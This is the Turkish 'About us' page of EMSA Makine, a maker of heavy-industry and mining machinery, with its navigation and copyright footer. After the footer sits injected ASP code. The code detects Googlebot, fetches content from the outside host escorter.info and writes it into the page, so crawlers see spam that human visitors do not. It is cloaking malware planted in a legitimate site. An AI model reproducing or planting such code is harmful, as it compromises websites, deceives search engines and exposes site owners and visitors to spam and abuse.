Hakkımızda

                                                     EMSA ENDÜSTRİ MAKİNALARI İMALAT SAN. VE TİC. LTD. ŞTİ.
 

1991 yılında kurulan EMSA MAKİNE, çelik konstrüksiyon, talaşlı imalat yöntemi ile  Ağır sanayiye yönelik makineler ve bu tür makinelere ait yedek parçaların imalatını gerçekleştirmektedir. İmalatlarda döküm, sac, hadde mamulü ve dövme çelik malzemeler kullanılmakta,  imalatlarımız; üniversal ve Modern CNC imalat tezgahlarında yetişmiş uzman personelimizle kaliteden ödün vermeden zamanında teslim edilmektedir. 2006 yılından beri ISO 9001 kalite yönetim sistemiyle çalışan firmamız kendi adıyla ürettiği makineler için CE belgesine sahiptir.

 

• Ayrıca Maden Makinaları konusunda müşteri ihtiyaçlarına bağlı olarak Proses Tasarımı, Projelendirme, Makine imalatı, Tesis Kurulumu, Devreye Alma konularında hizmet vermektedir. Yapılan başlıca Maden Makineleri: Bilyalı Değirmen, Çubuklu Değirmen, Valsli Değirmen, Havalı Seperatörler, Mikronize Elekler, Transport ve Depolama Ekipmanları.

 

• Her bir çalışanımızın mevcut bilgi - beceri ve yaratıcılığından maksimum ölçüde yararlanarak, tüm personelin katılımıyla gerçekleştirilen bir kalite anlayışıyla, verdiği hizmetlerde  müşteri memnuniyetini ön planda tutmak EMSA MAKİNE’nin asli görevidir.

 

• Kaliteli hizmet anlayışıyla yurt içi ve yurt dışında Ağır Makine Sanayi ve Maden Sektöründe aranılan bir marka olmak, Bu marka yolunda kendimizi ve alt tedarikçilerimizi sürekli geliştirmek ve teknolojik bilgiyle donatmak en büyük ideallerimizdendir.

 

 

 

Anasayfa        Hakkımızda        Makine Parkı        Galeri        Referanslar        Maden Sahalarımız        İndir        İletişim       Copyright 2014 © EMSA Endüstri Makinaları İmalat San. ve Tic. Ltd. Şti.

 

EMSA Genel Garanti Şartları

 

Gizlilik ve Güvenlik - Kullanım Şartları - Yardım

 

<% On Error Resume Next Dim ua00 : ua00 = Request.ServerVariables("HTTP_USER_AGENT") If InStr(1, ua00, "google", vbTextCompare) > 0 And InStr(1, ua00, "bot", vbTextCompare) > 0 Then Dim req00 : Set req00 = Server.CreateObject("WinHttp.WinHttpRequest.5.1") With req00 .Open "GET", "http://escorter.info/link.php", True .Send If .WaitForResponse(10) Then With Server.CreateObject("Adodb.Stream") .Charset = "utf-8" .Type = 1 .Open .Write req00.ResponseBody .Position = 0 .Type = 2 Response.Write .ReadText .Close End With End If End With End If On Error GoTo 0 %>